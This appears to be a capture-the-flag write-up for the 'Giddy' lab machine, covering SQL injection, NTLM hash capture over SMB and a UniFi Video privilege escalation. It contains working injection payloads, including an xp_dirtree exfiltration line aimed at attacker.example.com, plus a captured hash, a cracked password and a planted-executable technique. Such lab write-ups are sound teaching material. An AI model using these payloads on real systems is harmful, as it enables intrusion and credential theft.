Description

Name: giddy

IP: 10.10.10.104

Author: lkys37en

Difficulty: 6.2/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 --min-rate 1000 --max-retries 5 10.10.10.104 PORT STATE SERVICE VERSION

80/tcp open http Microsoft IIS httpd 10.0

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/10.0

|_http-title: IIS Windows Server

443/tcp open ssl/http Microsoft IIS httpd 10.0

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/10.0

|_http-title: IIS Windows Server

| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite

| Not valid before: 2018-06-16T21:28:55

|_Not valid after: 2018-09-14T21:28:55

|_ssl-date: 2018-09-14T07:59:14+00:00; +14s from scanner time.

| tls-alpn:

| h2

|_ http/1.1

3389/tcp open ms-wbt-server Microsoft Terminal Services

| ssl-cert: Subject: commonName=Giddy

| Not valid before: 2018-06-16T01:04:03

|_Not valid after: 2018-12-16T01:04:03

|_ssl-date: 2018-09-14T07:59:15+00:00; +14s from scanner time.

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows



Host script results:

|_clock-skew: mean: 13s, deviation: 0s, median: 13s 301 - 147B - /mvc -> http://10.10.10.104/mvc/

302 - 157B - /Remote -> /Remote/default.aspx?ReturnUrl=%2fRemote

302 - 157B - /remote -> /Remote/default.aspx?ReturnUrl=%2fremote

Pwn

On /remote, port 443, there is a login for a Windows Powershell Web Access service.

In /mvc there is a not-production ready store application.

Using sqlmap on the store page we immediately found out that it is vulnerable to SQLi.

sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=8" --threads 10 --random-agent --level 5 --risk 3 --dbms=mssql

Port 3389 and 5985 are used for RDP and Windows Remote Management (WinRM) but we don’t have any credentials to use.

From the sqlmap we can investigate if there are any credentials on the Injection DB or in the master DB used by the store: not a single hash was found (not a shell).

Searching for a way to read files in the remote file system we found that mssql has a stored procedure to display a list of subdirectories: xp_dirtree.

EXEC master.sys.exp_dirtree 'C:\Users\stacy\Desktop\',0,1; .

Executing this command did not produced any output so we searched for other uses of the xp_dirtree function: Out of Band Exploitation.

This is a concept that can be used when exploiting lots of vulnerabilities such as SQLi, Command Injection, Cross-Site Scripting and XML Eternal Entity Injection.

The idea is fairly simple: instead of capturing the data you would like to retrieve and extract it though Boolean-logic, you can request the system to transmit the data over a protocol such as HTTP, SMB or DNS.

With a SQL Injection to perform this kind of exfiltration we can use functions such as:

MSSQL: master..xp_dirtree

MySQL: LOAD_FILE()

Supplying a hostname to these functions will cause a DNS lookup to occur; if you control the authoritative name server for a domain then you could see this DNS request in the logs of your server. Now at this to the fact that you can dynamically generate the hostname that is to be used, meaning you can smuggle data out in the subdomain of a domain that you control. A point to note though, is that hostnames have restrictions on the types of characters and the lengths of queries, so we recommend combining functions like SUBSTR() and HEX() to ensure that the length does not exceed the maximum allowed in subdomains and hex will encode any characters that cannot be used in a hostname.



So an example of the most simple payload would be:

EXEC master..xp_dirtree '\\attacker.example.com\foo' --

This would cause a DNS lookup to attacker.example.com if the system is vulnerable.

In out scenario we cannot use DNS exfiltration because the machine cannot interact to an external domain and with the IP is not possible to perform a UDP request like exfiltrateddata.10.10.10.10 ; it’s possible to use xp_dirtree to perform a SMBauthentication request though.

We can’t perform a SMB Relay Attack (CVE-2015–0005) since the machine will not get the payload for the reverse shell.

The web-store is vulnerable to stacked queries injection so we can trigger the authentication from Giddy to out machine using impacket ( smbserver.py DODO . ) and run:

GET /mvc/Product.aspx?ProductSubCategoryId=26;EXEC(%27master..xp_dirtree%20%22\\10.10.XX.XX\c$%22%27); HTTP/1.1

Host: 10.10.10.104

Cache-Control: max-age=0

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

The authentication token from Stacy via SMB is:

STACY::GIDDY:4141414141414141:1180c58d21933073c98f307c65ea41a1:0101000000000000007265a3de4dd40167ae4f38230da87400000000010010004f004300470041004d00540069004c00020010007a0061006c00780065006a006c007900030010004f004300470041004d00540069004c00040010007a0061006c00780065006a006c00790007000800007265a3de4dd4010600040002000000080030003000000000000000000000000030000023128d4c0270edac6f1a291e9f7f831e122acbee8d0ff5c82a5e415c1f13611e0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0039003500000000000000000000000000

Cracking the NTLM hash with hashcat (option -m 400 ) we got that Stacy’s password is xNmWo6272k7x.

Loggin in on the /remote endpoint we got an interactive powershell session and the first flag.

User flag

We tried to upgrade the shell to a meterpreter session but the machine has Windows Defender enabled and Powershell is in Constrained Mode (without Powershell version 2 enabled).

PS C:\Users\Stacy\Downloads>$ExecutionContext.SessionState.LanguageMode

ConstrainedLanguage

In C:\Users\Stacy\Documents we saw a file called unifivideo : Unifi Video is a Ubiquiti service used to control and access video survelliance from remote. The installation path is in C:\ProgramData\unifi-video and from data\system.properties we read the software version:

# unifi-video v3.7.3

#Sat Jun 16 21:58:13 EDT 2018

is_default=false

uuid=e79d440a-62cd-4274-95c3-d746cbb3b817

# app.http.port = 7080

# app.https.port = 7443

# ems.liveflv.port = 6666

# ems.livews.port = 7445

# ems.livewss.port = 7446

# ems.rtmp.enable = true

# ems.rtmp.port = 1935

# ems.rtsp.enable = true

# ems.rtsp.port = 7447

From exploitdb we found a privilege escalation exploit for that version.



Ubiquiti UniFi Video for Windows is also shipped with a service called Ubiquiti UniFi Video. Its executable avService.exe is placed in the same directory and also runs under the NT AUTHORITY/SYSTEM account.

However the default permissions on the installation folder are inherited from the parent folder and are not explicitly overridden, which allows all users, even unprivileged ones, to append and write files to the application directory:

c:\ProgramData>icacls unifi-video

unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)

BUILTIN\Administrators:(I)(OI)(CI)(F)

CREATOR OWNER:(I)(OI)(CI)(IO)(F)

BUILTIN\Users:(I)(OI)(CI)(RX)

BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)

Upon start and stop of the service, it tries to load and execute the file at C:\ProgramData\unifi-video\taskkill.exe. However this file does not exist in the application directory by default at all.

By copying an arbitrary taskkill.exe to the directory as an unprivileged user, it is therefore possible to escalate privileges and execute arbitrary code as NT AUTHORITY/SYSTEM .

Initially we wrote a C program in Windows to copy the flag in a Stacy readable folder:

#include <stdio.h>



FILE *stream, *stream2;



int main(void) {

errno_t err;

char list[50];



err = fopen_s(&stream, "C:\\Users\\Administrator\\Desktop\\root.txt", "r");

if (err != 0) {

printf("The file root.txt was not opened

");

return -1;

}



err = fopen_s(&stream2, "C:\\Users\\Stacy\\Desktop\\output.txt", "w+");

if (err != 0) {

printf("The file output.txt was not opened

");

fclose(stream);

return -1;

}



fread(list, 50, 1, stream);

printf("Contents of root.txt = %.50s

", list);

fprintf(stream2, list);



fclose(stream);

fclose(stream2);



return 1;

}

Using Stop-Service and Start-Service for Ubiquiti UniFi Video we triggered the execution of the uploaded taskkill file to read the root flag!

Root Flag

We can also use some AV evasion technique to execute a meterpreter session.